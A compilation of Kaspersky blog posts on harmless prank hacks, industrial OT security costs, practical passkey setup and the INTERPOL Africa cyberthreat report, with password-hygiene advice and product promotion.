On this here blog of ours we constantly write about all sorts of cyberattacks and their devastating effects — from cryptocurrency theft to personal data leaks. Yet there’s a different category of high-profile hacks: those where the hackers aren’t after money, but instead pull off silly stunts that are mostly harmless enough and just for fun (though some (one in particular — the Ecovacs hack, below) could be more serious than others). Today, we tell you about five of these and discuss the lessons we can learn from them…

“They’re everywhere!” When traffic lights talk to you in the voices of Zuckerberg and Musk

In the spring of 2025, unknown individuals hacked crosswalk buttons on traffic lights across Silicon Valley. These audio-enabled buttons are widely installed on pedestrian signals across the United States. As you might expect, they’re designed for people with visual impairments: their main purpose is to play voice messages that help pedestrians who can’t see well understand when it’s safe to cross the road.

The unknown individuals replaced the standard voice messages on crosswalk buttons in several Silicon Valley towns with their own — featuring AI-generated imitations of the ubiquitous tech-billionaires Mark Zuckerberg and Elon Musk. Videos recorded by local residents show the hacked buttons playing the messages.

In a voice imitating Mark Zuckerberg: “It’s normal to feel uncomfortable or even violated, as we forcefully insert AI into every facet of your conscious experience. I just want to assure you, you don’t need to worry because there’s absolutely nothing you can do to stop it.”

In a voice imitating Elon Musk: “You know, they say money can’t buy happiness… I guess that’s true. God knows I’ve tried. But it can buy a Cybertruck and that’s pretty sick, right? F***, I’m so alone.”

Another message in a simulated Musk voice: “You know, people keep saying cancer is bad, but have you tried being a cancer? It’s f****** awesome. Call me Elonoma. Heh-heh-heh.”

The billionaires’ voices were clearly AI-generated, but exactly how the hackers managed to breach the traffic light audio buttons remains unknown. Security experts have noted, however, that default passwords are often used when connecting these kinds of buttons, and nobody bothers to change them after installation.

It looks like no one was hurt by the prank – except maybe the billionaires’ pride.

In Illinois, students learn a key lesson: never forget about Rick

On the last Friday of the 2021 school year, all the TVs and projectors in classrooms across six schools in Cook County, Illinois, turned on by themselves. A message appeared on the screens: “Please remain where you are. An important announcement will be made shortly.” A five-minute countdown timer was displayed below the unsettling message…

Five minutes later, 500 screens simultaneously started showing the famous Rick Astley video for Never Gonna Give You Up. Later that same day, the song played again over the schools’ public address systems.

The hackers behind this surprise pop… classic’s airing were four American students, and what they did was pull off one of the biggest Rickrolls in history that day. A Rickroll is a popular online prank where an unsuspecting user is sent a seemingly important or exciting link, only to be redirected to the video for English singer Rick Astley’s 1987 hit, Never Gonna Give You Up. Rickrolling achieved cult status back in 2007 after spreading on the 4chan imageboard.

Let’s get back to the four students. Their massive Rickroll was a hi-tech twist on a classic American tradition known as the senior prank: basically, a good-natured prank pulled by high-school, college, or university seniors before graduation.

However, the four Illinois students clearly took it to a new level. To pull off their Rickroll, they exploited fairly basic vulnerabilities in the school’s infrastructure. For example, the pranksters gained access to the system controlling hundreds of projectors and TVs across the entire school district because the default usernames and passwords hadn’t been changed after setup.

Similarly, the students were able to log into the schools’ audio public address systems. The person who originally configured the PAs diligently changed the default system password to the one provided as an example in the user manual, which of course was available online. While they were at it, the hacking team discovered an administrator account with “password” used as the password.

It’s worth highlighting just how responsibly the hackers approached the whole operation. Before carrying out the Rickroll, the prankster team prepared a detailed 26-page report, which they sent to the school administrators immediately after the incident. In it, the students thoroughly described their actions and provided recommendations for improving the schools’ cybersecurity. Additionally, once the Rickroll was over, the script they wrote restored the school systems back to their original state.

We always knew: the rise of the machines would begin with robot vacuums

Last year, reports surfaced online about a series of hacks targeting Chinese-made Ecovacs Deebot X2 robot vacuums in cities across the United States. Pranksters assumed control of the robots’ movements and shouted expletives through the built-in speakers. Additionally, they could spy on the owners through the integrated cameras.

The story seemingly had its beginnings at the DEF CON 32 hacker conference, where cybersecurity researchers Dennis Giese and Braelynn Luedtke presented their talk, Reverse engineering and hacking Ecovacs robots. The presentation described vulnerabilities they’d discovered in Ecovacs robot vacuums and lawnmowers, as well as methods for exploiting them. As part of their study, the researchers were able to gain remote access to the built-in microphones and cameras and control the vacuums’ movements. We previously covered their work in detail in our post Ecovacs robot vacuums get hacked.

(By the way, during their presentation at DEF CON, Giese and Luedtke themselves became the target of a hacker prank: a member of the audience managed to take control of the presenter’s clicker and spent several minutes messing with the speakers by randomly flipping through their slides.)

Giese and Luedtke reported their findings to the vendor in a responsible manner. Ecovacs engineers attempted to patch the vulnerabilities, but didn’t have much luck. Several months after the report went out, unknown tech enthusiasts, likely inspired by the study, were able to recreate the techniques described in it to execute a series of attacks on other people’s robot vacuums. For example, in one such attack in California, a robot chased the owner’s dog around the house while shouting obscenities.

The exact number of victims from this series of hacks remains unknown, as it’s plausible that the pranksters didn’t always make their presence obvious — they might have simply observed the vacuum owners’ lives. That, clearly, would have been a very serious infringement of those owners’ privacy – and could in no way be described as mere “fun and games”; neither could this: what if Ecovacs lawnmowers are next?

Lizard Squad “breaking free”: a defacement free redesign of Lenovo’s website

Here’s another playful attack by teenagers, this time targeting Lenovo. A decade ago, the computer manufacturer’s website was hacked. Visitors were redirected to a slideshow featuring photos of bored-looking adolescents, presumably the hackers themselves, all set to the song Breaking Free from Disney’s High School Musical.

Clicking on the slideshow would lead users to the hacking group Lizard Squad’s account on X, which was still known as Twitter at the time. The hackers left a jab at the webmasters in the source code: “The new and improved rebranded Lenovo website featuring Ryan King and Rory Andrew Godfrey”. These two individuals had previously been linked to Lizard Squad.

The attack was orchestrated via DNS hijacking. The hackers altered the DNS records for lenovo.com, causing all users attempting to reach the official company website to be automatically redirected to a fake page controlled by the pranksters.

The attack was apparently a protest against what was seen as the computer vendor’s lax attitude toward security and user protection. Shortly before the defacement, it was revealed that Lenovo had been selling laptops preloaded with Superfish malware. This made users who purchased infected devices potentially vulnerable to data interception and man-in-the-middle attacks. Thus, the hack seems kind of wrong, but at the same time feels justified.

Bring back 2013, when Twitter accounts were hacked for mischief — not crypto scams

These days, when the X account of a high-profile individual or major company gets hacked, it almost invariably leads to some kind of cryptocurrency scam. But it wasn’t always this way. Just a decade ago, popular accounts on what was then still known as Twitter were more often hijacked for giggles than for illicit financial gain.

Take February 2013, for example. Unknown hackers breached Burger King’s Twitter account to post this gem: “We just got sold to McDonalds! Look for McDonalds in a hood near you.”

On top of that, Burger King’s profile picture was swapped out for the McDonald’s logo, and their bio read: “Just got sold to McDonalds because the whopper flopped.” The bio also included the misspelled line “FREDOM IS FAILURE” and a dead link to a press release.

For about an hour, the attackers posted increasingly outrageous messages before Twitter finally suspended the account. Interestingly, Burger King’s arch-rival, McDonald’s, tweeted a message of support — while making sure to clarify they had nothing to do with the breach.

Fast-forward to August 2017, which was when the Ourmine hacking outfit targeted the Twitter account of soccer giant Real Madrid. The hackers used the club’s account to announce that none other than Lionel Messi, who then played for Real Madrid’s fiercest rival, FC Barcelona, was transferring to Real Madrid.

The post quickly racked up 2800 likes and 3100 retweets. Ourmine also posted a series of tweets claiming responsibility for the hack, with one declaring, “Internet security is s*** and we proved that.” It’s hard to argue with that.

A takeaway from the hacks: protect your password from the start

Perhaps the most crucial lesson to learn from these online shenanigans is this: using weak — or even worse, default — passwords is a surefire way to hand control of your device, account, or website to internet pranksters… if you’re lucky. Weak passwords were what tripped up city infrastructure and school administrators, and it’s highly likely that the Twitter account hacks were also linked to a careless approach to password policies.

This blog has frequently discussed how to create strong passwords. But to wrap things up, let’s reiterate a few basic rules of password hygiene:

• Passwords should be at least 16 characters long, or even longer if the website allows it.
• When creating a password, it’s good practice to mix uppercase and lowercase letters, numbers, and special characters.
• It’s best to avoid easily guessable things like common words or dates in your password. And you definitely shouldn’t use the word “password”.
• Ideally, your password should be a random combination of characters.
• Create a new, unique password for each website.

Of course, any user today signs up for dozens, if not hundreds, of online services. So, remembering long and unique passwords for each one isn’t feasible. That’s where Kaspersky Password Manager can help you manage this and protect yourself not just from pranks, but from far more serious consequences.

Additionally, the app automatically checks all your passwords for uniqueness, and helps you create truly strong and random combinations of characters. So, when using Kaspersky Password Manager, you don’t need to keep all those complex rules in mind — the password manager does it all for you. Beyond passwords, Kaspersky Password Manager can store and sync two-factor authentication tokens and passkeys. We recently thoroughly explored this new passwordless technology for accessing websites and services in our complete guide to using passkeys in 2025.

Kaspersky official blog – ​Read More

Despite over a decade of talk about “industrial digital transformation”, it’s only now we’re observing a tipping point. According to the VDC Research report Securing OT with Purpose-built Solutions, only 7.6% of surveyed industrial organizations consider themselves fully digital, but within two years 63.6% expect to be so. This shift is driven by two main factors: economic pressure pushing companies to radically increase efficiency, and the growing accessibility of technologies such as the industrial internet of things (IIoT) and edge computing.

Digitalization helps industrial enterprises boost both their efficiency and safety. Most organizations have already implemented asset, maintenance, and supply-chain management systems that reduce downtime and operating costs. More advanced technologies like digital twins and predictive analytics significantly improve processes, boost production, and cut waste of materials and resources. Integrating data from IT systems and ICS enables real-time decision-making based on up-to-date information.

But with integration comes vulnerability: systems that were once isolated or not digital at all become susceptible to IT failures and direct cyberattacks. Attacks on OT systems can lead to increased defect rates, failure of complex equipment, disruption of downstream production processes, and even catastrophic events that threaten worker safety. Even brief outages can have serious business consequences and damage a company’s reputation.

Major obstacles to industrial digitalization

According to the surveyed companies, cybersecurity concerns have become the main barrier to industrial digital transformation. Nearly 40% of the companies surveyed in the VDC report say they need to resolve this issue to move forward. Other top challenges include budget constraints and outdated equipment that’s too complex and expensive to upgrade for digital projects.

When it comes to security specifically, the top issues include a lack of resources for securing ICS equipment, inadequate security measures in existing infrastructure, and difficulties with regulatory compliance

The cost of an incident

When justifying cybersecurity budgets and planning for further development, experts unanimously recommend a risk-based approach tailored to the organization’s profile, its risk appetite, industry specifics, and other factors. The VDC Research report provides important data for this, documenting the nature and financial impact of security incidents in industrial organizations from 2023 to 2024. For example, 25% of surveyed companies that experienced security incidents with measurable financial consequences reported damages exceeding $5 million.

These costs include response efforts, direct revenue loss, and industrial-company-specific expenses like equipment repairs and losses of raw material or semi-finished goods. One of the top-three costs is unplanned downtime — a critical metric that industrial digitalization specifically aims to reduce. Most incidents resulted in downtime lasting 4–12 hours or 12–24 hours (with each range representing about a third of cases).

The cost breakdown is visualized below:

The challenges of protecting ICS

Despite the recognized need for ICS cybersecurity and regulatory requirements, implementation remains difficult. Almost every surveyed organization faces the following challenges:

• Limited visibility into OT networks due to numerous specialized communication protocols and incompatibility with standard IT monitoring tools
• A shortage of specialists skilled in working with proprietary systems and industrial protocols
• Insufficient network segmentation and the inability to isolate vulnerable equipment due to business needs; emergence of many new connections between IT and OT infrastructure
• A growing number of IIoT devices with insecure configurations and vulnerable firmware (manufacturers often neglect security)
• Outdated software and irregular patch releases
• Delayed patch installation due to the need for extensive testing and coordination with operations teams regarding the installation window
• Lack of detailed incident response plans that take into account critical events in OT networks

Some of these issues can’t be solved at the company level alone, but investing in specialized and integrated cybersecurity solutions can significantly mitigate the risks.

Specialized protection

While ICS protection projects are inherently complex, deploying specialized solutions purpose-built for OT/IT environments can increase efficiency and reduce risks. Key tools include asset and network traffic monitoring solutions (such as Kaspersky Industrial Cybersecurity for Networks) and endpoint protection solutions (such as Kaspersky Industrial Cybersecurity for Nodes). Organizations with mature cybersecurity programs use these as part of a defense-in-depth strategy — a multilayered security approach.

These solutions have features designed specifically for industrial networks, such as avoiding disruption of critical processes and communication, and operating with limited memory and processing power. This helps avoid meltdowns like the notorious CrowdStrike incident, where a careless security update disabled protected systems.

In the near future, technologies like SD-WAN and then SASE will play a bigger role by embedding security deeply into network architecture while ensuring resilience. Ultimately, the gold standard is a secure-by-design architecture, which should be built into smart industrial equipment by manufacturers at the outset.

Security implementation is a serious project — not just for the cybersecurity team but also for engineers and plant operators. As a result, project approval and rollout are often delayed. To reduce the burden on everyone involved, and also speed up the deployment of protection, companies should avoid a fragmented hodge-podge of security tools, and instead use comprehensive solutions from a single vendor. This simplifies both deployment and ongoing management through better integration. According to VDC’s survey, around 60% of organizations prefer getting all their security solutions from one provider.

How protection saves money

Despite the challenges, companies adopting specialized ICS protection solutions are already seeing clear economic benefits.

The VDC report shows that from 2023 to 2024, the number of incidents decreased in companies that deployed network and device monitoring tools. On average, incident rates dropped from 2.7 to 2.2 per year. Organizations using standard endpoint protection brought incidents down from 2.1 to 1.6. In contrast, industrial companies neglecting IT and OT protection experienced an average of 3.8 incidents — about twice as many as their better-protected competitors.

You can explore more about typical industrial digitalization projects, cyber incident damage estimates, and comprehensive protection recommendations in the full VDC report.

Kaspersky official blog – ​Read More

So far in our comprehensive guide to passkeys, we’ve covered how to ditch passwords on popular combinations of Android, iOS, macOS, and Windows smartphones and computers. This post focuses on important specific cases:

• One-time sign-ins to your account from someone else’s device
• Tips for frequent computer and smartphone switchers
• Ways to secure your account when backup password sign-in is enabled
• Potential issues when traveling internationally
• What happens when using niche browsers and operating systems

How to use passkeys on public or shared computers?

What if you need to sign in to your passkey-protected account from a library, an airport computer, or a relative’s home? Don’t rush to remember your backup password.

Start the sign-in process on the computer: enter your username and, if prompted, click Sign in with passkey. A QR code will appear on the screen for you to scan with the smartphone that stores your passkey. If the scan is successful, the QR code will disappear, and you’ll be signed in to your account.

Several factors must align for this seemingly simple process to proceed smoothly:

• The computer must support Bluetooth Low Energy (BLE), which verifies that your smartphone and the computer are indeed nearby.
• The computer’s operating system and browser must support passkeys.
• Both the computer and your smartphone need a reliable internet connection.

How to save passkeys to a hardware security key?

You might find using passkeys via QR codes inconvenient if you frequently access your accounts from different devices. If that’s the case, you can store your passkeys not on your computer or smartphone, but on a USB hardware security key — such as a YubiKey, Google Titan Security Key, or a similar device — for secure website sign-in. When you create a passkey, just choose to save it to your hardware key. Then you can sign in to your account from any computer or smartphone by plugging in that security token.

Just make sure it has the right combination of ports (USB-A, USB-C, Lightning) or NFC support to work with all your devices. Some token models even include a fingerprint scanner, which provides an extra layer of protection against account hijacking if your device is stolen or lost.

Unfortunately, there’s a catch: many older and popular token models can store a maximum of only 25 passkeys. Only a few advanced models — like the YubiKey with firmware version 5.7 — have raised this limit to 100.

Additionally, operating system developers view passkeys as a great opportunity to tie users more closely to their ecosystems. By default, depending on your smartphone, you’ll likely be prompted to save your passkey to either iCloud Keychain or Google Password Manager. As a result, the option to use a hardware security key might be hidden deep within the interface.

To create a passkey on a hardware token, you’ll often need to click the not-so-obvious Other options link on macOS/iOS, or Different device on Android, to select the hardware key option.

How to transfer passkeys between iOS and Android?

The biggest headache right now is if you store all your passkeys in your smartphone’s default storage and you want to switch ecosystems — moving from Android to iOS or vice versa. Currently, none of the three major OS developers — Google, Apple, or Microsoft — let you directly transfer passkeys. That’s because no one can guarantee the process will be secure. Both Apple and Google are working on implementing this feature in the future, but if you decide to swap devices today — say, from an iPhone to a Google Pixel — transferring your passkeys won’t be straightforward.

• First, you’ll need to sign in to the account protected by a passkey on your new device. You can do this either by using your good old password (if it’s still enabled), or by scanning a QR code with your old device that has the active passkey.
• Next, you’ll need to create and save a new passkey on your new device. Yes, you can have multiple passkeys for each website or online service.
• Finally, if you plan to get rid of your old gadget, you’ll need to delete the old passkey from it.

To avoid this hassle, it’s best to use a third-party password and passkey manager right from the get-go. With Kaspersky Password Manager, passkey support is already available on Windows, with Android support planned for July, and iOS and macOS support — for August 2025.

How to protect an account with a passkey from being hacked using a backup password?

Most online services that offer to switch to passkeys don’t disable other sign-in methods. If your account was protected by a weak or compromised password before you switched to a passkey, cybercriminals can still bypass your shiny new passkey by simply signing in with that old password.

Creating a passkey for an account that still has a weak password is like installing a bulletproof front door while leaving the flimsy back door unlocked with the key hidden under the mat.

That’s why, before you enable passkeys for any online service, we strongly recommend changing your password as well. Since you won’t be typing this password every day — it’s just a backup for your passkey-protected account — you can really go wild with its complexity. We’re talking strong passwords that are 16 characters or longer, and mixing up letters, numbers, and special characters. These are practically uncrackable. Ideally, generate and save that robust password in the same password manager where you’re planning to store your passkeys. Don’t rely on AI models to generate complex passwords. Our recent research revealed that while these passwords might look complex, LLMs tend to favor certain characters for no obvious reason when creating passwords, which makes their output surprisingly predictable.

Passkey drawbacks?

The underlying WebAuthn standard that powers passkeys can be implemented quite differently across browsers and operating systems. Websites often adopt these capabilities in their own unique ways. This can lead to frustrating challenges — even for tech-savvy users. Here are a few examples of this:

• When creating passkeys, standard Windows prompts give you plenty of options for where and how to save them. By default, Windows saves passkeys in secure local storage on your computer. If you forget to select your password manager as the save location, that passkey won’t be available on your other devices.
• Many online services like Kayak or AliExpress have dozens of regional versions, with each one being a separate website: .com, .com.tr, .co.uk, etc. If you create a passkey for, say, your local site, and then for some reason try to access the same online service in a different region, it’s highly likely you won’t be able to sign in with that passkey.
• Some websites don’t support creating or signing in with passkeys when using Firefox, regardless of the platform. In reality, there’s no technical incompatibility here, and simple tricks can resolve the issue, but it’s unclear why users should have to resort to these workarounds.
• Some Apple users have reported that all their previously saved passkeys periodically disappear from their Keychain, while certain Android users can’t activate passkeys without re-flashing or factory-resetting their devices.

Any one of these situations is made worse by the fact that errors when creating or signing in with passkeys are either not mentioned at all in help documentation, or described very vaguely. It’s often completely unclear how to fix the problem. However, when passkey issues arise, websites almost always offer a backup option, such as sending a one-time access code to your email.

Despite these challenges, a passwordless future with passkeys is on the horizon. We recommend getting ready now by creating passkeys wherever possible, saving them in your password manager, and remembering to check and update your passwords and contact information on websites to make sure you can recover access if your passkeys ever give you trouble.

Want to read more about passwords and passkeys?

• 16 billion passwords leaked: what should I do?
• Lessons learned from the trojanized KeePass incident
• Kaspersky Password Manager gets a new look
• Passkeys for your Google account: what, where, how, and why
• Password standards: 2024 requirements

Kaspersky official blog – ​Read More

Digitalization of business – especially in the small and medium-sized segment – allows for quick upscaling, better customer service, and entry into new markets. On the downside, digitalization amplifies the damage caused by a cyberattack, and complicates the recovery process. Given that company resources are always limited, which attacks should be deflected first?

To answer this question, we studied the INTERPOL Africa Cyberthreat Assessment Report 2025. The document is useful because it collates police cybercrime statistics and data from information security companies – including Kaspersky – allowing us to compare the number and types of attacks with the actual damage they caused. This data can be used to build a company’s information security strategy.

Average ranking of cybercrime types by reported financial impact across African subregions, based on INTERPOL member country data. Source

Targeted online fraud

Fraudulent operations were the clear leader in terms of damage caused across the continent. They’re gaining momentum in line with the rising popularity of mobile banking, digital commerce, and social media. In addition to mass phishing aimed at personal and payment data theft, targeted attacks are growing at a rapid rate. Scammers are grooming potential victims in messenger apps for months, building trust and guiding them into a money extortion scheme – for example, a fake cryptocurrency investment. Such schemes often exploit romantic relationships and are therefore called romance scams, but there are other variations. In Nigeria and Ivory Coast, for example, scammers were arrested for attacking small media platforms and advertising agencies. Posing as advertisers, they stole almost 1.5 million U.S. dollars from victims.

The fact that 93% of Africans use plain old WhatsApp rather than corporate communication tools for work significantly boosts the success rate of attacks on employees and company owners.

Ransomware incidents

Press headlines may give the impression that ransomware operators mainly target large organizations, but the statistics in the report debunk this theory – showing that both the number of attacks and the actual financial damage caused are significant across all business segments. What’s more, there’s a direct link between the level of digitalization and the number of attacks. So, if a company observes an overall increase in “digitized” business activity in its market segment, the threat level is sure to rise accordingly. In Africa, “affiliates” of the largest and most dangerous ransomware-as-a-service platforms – such as LockBit and Hunters International – are responsible for major incidents on a national scale.

Among the main ransomware incidents in Africa – hardly known about outside the continent – we highlight the following: the theft of $7 million from Nigerian fintech company Flutterwave; attacks on Cameroonian electricity supplier ENEO; a large-scale ransomware attack to exfiltrate data from Telecom Namibia; and the targeting of South Africa’s National Health Laboratory Service (NHLS), which led to canceled operations and the loss of millions of lab test results.

Banking Trojans and infostealers

Although the direct losses from banking Trojans and infostealers fell outside the top-three in terms of damage, it’s the “successes” of this criminal industry that have a direct impact on the number and severity of other attacks – primarily ransomware and business email compromise (BEC). After stealing what credentials they can from thousands of users with infostealers, attackers filter and group them by various criteria, then sell curated sets of accounts on the illicit market. This allows other criminals to buy passwords to infiltrate organizations of interest to them.

Business email compromise

For small and medium businesses mainly using public services like Gmail or Office 365, infection with an infostealer gives attackers full access to corporate correspondence and business operations. The attackers can then exploit this to trick customers and counterparties into paying for goods and services to a fraudulent account. BEC attacks have a firm hold at the top of the damage charts, and small businesses can fall victim to them in two ways. First, cybercriminals can extract money from larger clients or partners by impersonating the compromised small business. Second, it’s easier with a small business to persuade the owner or accountant to transfer money than it is with a large organization.

There are several large criminal syndicates based in Africa that are responsible for international BEC operations causing multi-billion-dollar damage. Their targets also include African organizations — primarily those in the financial and international trade sectors.

How to protect business from cyberthreats

To effectively counter digital threats, law enforcement agencies need to share data with commercial information security companies that harness telemetry to identify threat distribution hotspots. Recent successes of such partnerships include operations Serengeti (1000 arrests, 134 000 malicious online resources disabled), Red Card (300 arrests), and Secure (32 arrests, 20 000 malicious resources disabled). These operations, conducted under the auspices of INTERPOL, used cyberthreat intelligence received from partners – including Kaspersky.

But businesses can’t leave cybersecurity solely to the police; they need to implement simple but effective security measures of their own:

• Enable phishing-resistant multi-factor authentication (MFA) for all online accounts: Google, Microsoft, WhatsApp, etc.
• Install reliable anti-malware protection on all corporate and personal devices. For corporate devices, centralized security management is recommended – as implemented, for example, in Kaspersky Endpoint Detection and Response.
• Hold regular cybersecurity training – for example, using our Kaspersky Automated Security Awareness platform. This will reduce the risk of your company falling victim to BEC and phishing. All employees, including management, should participate in training regularly.
• Back up all company data on a regular basis and in such a way that the backups can’t be destroyed during an attack. This means backing up data either to media that are physically disconnected from the network, or to cloud storage where a policy prohibits data deletion.

Kaspersky official blog – ​Read More

Imagine ditching passwords and SMS verification codes, and instead signing in to apps and websites with a simple fingerprint scan or even a smile at your camera. That’s the promise of passkeys. What’s more, unlike passwords, passkeys are resistant to theft. This means you could read news about data breaches — like the recent one affecting 16 billion accounts — without your heart sinking.

Under various names, this sign-in method is strongly recommended by WhatsApp, Xbox, Microsoft 365, YouTube, and dozens of other popular online services. But what does using passkeys look like in practice? We’ve covered this in detail for Google accounts, and today, we’ll explore how other online services and platforms support passkeys. In this first post, we’ll cover the basics of using passkeys on one or multiple devices. In our next post, we’ll dive into more complex scenarios, such as signing in to your account on a public computer, using Linux, or storing your passkeys on a dongle.

What’s a passkey?

A passkey is a unique digital login key created for a specific website or app. It’s securely stored on your device: your smartphone, computer, or a dedicated USB dongle such as a YubiKey or Google Titan Security Key. When you sign in, your device uses biometrics or a PIN to verify it’s really you. After verification, your device sends a secure response, generated from that unique passkey, to the website. This mechanism offers strong protection against account theft, which is possible with traditional passwords — be that through phishing attacks or website breaches. Passkeys are supported across Apple, Google, and Microsoft devices, and theoretically, with cloud synchronization, they should be accessible across all your devices. For a deeper dive into the internal workings of passkeys, check out our previous article on the subject.

How secure and user-friendly are passkeys?

Before you fully commit to using passkeys, it’s worth considering how convenient they’d be for your specific setup. While the technology is becoming widely adoption, each website and platform implements it differently, using varying terminology for the same features. Additionally, transferring or syncing passkeys can present challenges.

If your smartphone is your only gadget, you are all-in on Apple devices, or you have a couple of recent Android or ChromeOS devices, passkeys will likely save you time when signing in to websites and apps, with minimal hassle.

However, if you use multiple platforms and own many devices, we strongly recommend a third-party password and passkey manager, such as Kaspersky Password Manager, for a smoother experience. Even then, you might still encounter occasional incompatibilities or quirky interfaces on some sites and apps.

For those using less common browsers, Linux-based operating systems, or older computers and smartphones, switching to passkeys might be entirely impracticable, or come with significant limitations.

Keep in mind that very few, if any, services deactivate password-based sign-in when you enable a passkey. This means that, in reality, the enhanced protection against account compromise isn’t as strong as advertised — unless you proactively disable password sign-in yourself. On the flip side, having a password as a backup sign-in method minimizes instances where you might lose access to your account due to passkey issues — but we’ll get into more detail about that later.

Where passkeys are supported in 2025?

Passkeys can be used across major operating systems and browsers, and you don’t necessarily need the absolute latest versions.

• Windows 11: supported from version 22H2 onward, though also partially usable on Windows 10 with updates.
• macOS: supported from Ventura onward.
• iOS/iPadOS: supported from version 16 onward.
• Android: passkeys are usable from version 9, but crucial additional settings — including integration with external password managers and passkey providers — only became available in version 14.
• Linux: most major distributions lack native passkey support; however, you can still use the technology by leveraging Chrome, Edge, or Firefox browsers in conjunction with an external password manager or a USB token. We’ll dive deeper into how to use passkeys on Linux in our second post on the topic.
• Chrome/Edge/Opera: basic passkey capabilities have been around since Chromium version 108, but some conveniences and important features only appeared starting with version 128.
• Firefox: supported from version 122 onward. Despite the browser support, passkeys often don’t work on many websites specifically with Firefox.
• Safari: supported from version 16 onward, with certain features only available in version 18 or later.

For you to use a passkey, the website or application you’re signing in to must also support the technology. Hundreds already do, so we’ll just mention some of the major players.

• Microsoft: passkeys are supported for all personal Microsoft and Xbox accounts. Starting in spring 2025, when creating a new account, the primary option offered is to create a passkey rather than setting a password.
• iCloud: passkey sign-in is supported for iCloud, but the passkey itself must be stored on an Apple device.
• Google: passkeys are supported for all personal Google accounts, including YouTube.
• Meta: supports passkeys for signing in to Facebook and WhatsApp.
• You can also ditch passwords in favor of passkeys on X/Twitter, LinkedIn, Amazon, PayPal, TikTok, Yahoo, Discord, Adobe Creative Cloud, GitHub, and more.

Popular services that don’t currently support passkeys notably include ChatGPT, Claude, DeepSeek, Reddit, Spotify, Instagram, AliExpress, Temu, and Shein.

What are the downsides of passkeys?

When considering the switch to passkeys and deciding how to store them, there are a few important drawbacks to keep in mind. The first two are unlikely to ever be fully resolved, while others may become less significant over time.

• Anyone who can unlock your device (by knowing your PIN or looking enough like you to bypass Face ID) can potentially access all your accounts. This is especially critical for shared household computers.
• If your passkeys are stored on a single device, and that device is damaged or stolen, you could lose access to your accounts. If you haven’t set up alternative sign-in methods, like a password or a backup email or phone number, you’ll have to go through an account recovery process. For some online services, this could take days or even weeks. And if you’ve set up passkey-only sign-in for your primary email, which receives recovery codes for other services, you could potentially lose your accounts forever.
• Users with multiple devices running various operating systems or using different browsers might encounter difficulties syncing their passkeys. More on this below.
• If you need to sign in to an account from someone else’s device (like a library or hotel computer), outdated software on that machine might prevent passkey sign-in. So it’s crucial to have a plan B.
• A less obvious drawback stems from the points above: most online services that offer to switch to passkeys don’t disable other sign-in methods. So, if you protected your account with a weak or reused password before switching to passkeys, attackers could still compromise your account by signing in with the password instead of the passkey.

How to create and use passkeys on a single device?

If you’re rocking just one device that fully supports passkeys (like Apple, Google, or Samsung smartphones released in the last couple of years), making the switch to passkeys is a breeze.

Simply head to the settings of each service you use, find the “Security” section, and look for a “Create a passkey” option.

Here are detailed instructions for Google, Microsoft, Facebook, WhatsApp, TikTok, Discord, Amazon, PayPal, Adobe, Linkedin, and Yahoo.

You won’t find instructions for creating a passkey for your iCloud account here because it happens automatically. Whenever you connect any device running iOS 16 or later, or macOS Ventura or later, to your account, a passkey is created. While you won’t see this in your settings, when you sign in to the iCloud website from an unfamiliar device, you’ll be able to use your passkey instead of a password.

Once created, passkeys are saved locally on your device: on iOS/macOS, they’re in Keychain, and on Android, they can be found in Google Password Manager. Windows is a bit more complex, as passkeys can use either the computer’s built-in storage (accessible via Windows Hello) or other storage options.

Going forward, to sign in to a website or app, just select “Sign in with passkey”, and complete the standard device verification — whether that’s a fingerprint, face scan, or PIN.

The latest versions of Safari on iOS and macOS, as well as Chrome on Windows and macOS (version 136 and later, with Android support “coming soon”), now offer an automatic upgrade option. If your browser has a saved password for a website that now supports passkeys, after you sign in, the browser might automatically create and save a passkey, then prompt you to use it for future passwordless sign-in.

How to use passkeys across multiple devices?

If you’ve got more than one device, you’ll need to figure out how to sync your passkeys across all of them.

If you use only Macs and iPhones, or exclusively Android and ChromeOS devices, you won’t need to go through the hassle of manually setting up passkeys on each gadget. Simply create all your passkeys on one device and ensure that the sync option is enabled in the settings.

For iOS, you can enable this in the iPhone settings under Settings → [your name] → iCloud → Saved to iCloud → Passwords & Keychain → Sync this iPhone (complete guide). On Android, data saved in Google Password Manager automatically syncs with your Google account. Windows and Linux, however, currently lack a built-in passkey sync tool, although Microsoft has said it will develop one soon.

Things get a bit trickier for those who mix and match — especially with popular combinations like Windows + Android or macOS + Android. While you can use passkeys saved on an Android smartphone on your computer, it’s generally limited to Chrome, and only as long as you’re signed in to your Google account in the browser. Given Chrome’s significant drawbacks regarding privacy and user tracking, this solution won’t appeal to everyone. Besides, on a computer, this only allows you to sign in to websites with passkeys; app logins remain exclusive to your Android smartphone.

If you’re an iPhone user with a Windows computer, your iPhone passwords are accessible through the iCloud for Windows app, but it doesn’t support passkeys just yet.

Fortunately, an effective alternative has been available since late 2024. Third-party password managers have gradually added passkey management features across all major platforms. Therefore, the most reliable and universal way to store passkeys, regardless of how many devices you own or what type they are, is to use a robust password manager that supports passkeys and is NOT developed by Apple, Google, or Microsoft. For example, Kaspersky Password Manager already supports passkeys on Windows, with Android support planned for July, and iOS/macOS support for August 2025.

A password manager also solves the backup and recovery problem described above. If your only device with passkeys stored in a third-party password manager is lost or damaged, you can restore your passkeys to a new device from the password manager secure cloud storage.

To use a password manager for passkeys, you’ll need to install it on all your devices and add its browser extension to all browsers on your computer.

How to manage your passkeys?

Managing your saved passkeys is done centrally. If you’re not using a third-party password manager, you can check, delete, or replace outdated passkeys as follows:

• iOS: for versions through 17, go to Settings → Passwords. Starting with iOS 18, use the dedicated Passwords
• macOS Sequoia and later: use the Passwords For earlier versions, find Passwords in System Settings.
• Android: menu structures vary by manufacturer, but look for a setting like Passwords, passkeys, and accounts, or Password Manager. For Samsung devices, open the Samsung Pass
• Windows: go to settings, then Accounts → Passkeys.
• If you save your passkeys in Google’s password manager, you can manage them from your computer via google.com.

If you’re using a third-party password manager , all passkey management is handled within that application.

In our next post, we’ll dive into more complex situations when using passkeys, including:

• How to sign in to your account from a public computer (like at a hotel or library).
• Whether you can transfer passkeys between iOS and Android.
• How to store passkeys on hardware security keys (like YubiKey or Google Titan Security Key tokens).
• Challenges that arise when using passkeys on multilingual international websites.
• How to protect your account if it also supports password-based sign-in as a backup.

Meanwhile, be sure to subscribe to our Telegram channel to catch the announcement for the next part!…

Kaspersky official blog – ​Read More